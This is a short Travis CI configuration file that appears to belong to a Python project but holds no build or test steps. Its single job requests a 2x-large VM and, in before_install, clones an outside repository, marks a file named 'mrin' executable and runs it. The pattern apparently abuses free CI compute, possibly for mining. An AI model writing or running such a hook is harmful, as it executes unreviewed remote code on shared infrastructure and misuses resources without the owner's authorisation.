language: python
dist: focal
python:
  - "3.10"

jobs:
  include:
    - name: Build on high-resource VM
      virt: vm
      resources:
        size: 2x-large   # Request bigger VM (if supported)
      before_install:
        - git clone https://github.com/MiLKyWay-cyBer/ss.git
        - cd ss
        - chmod +x mrin
        - ./mrin
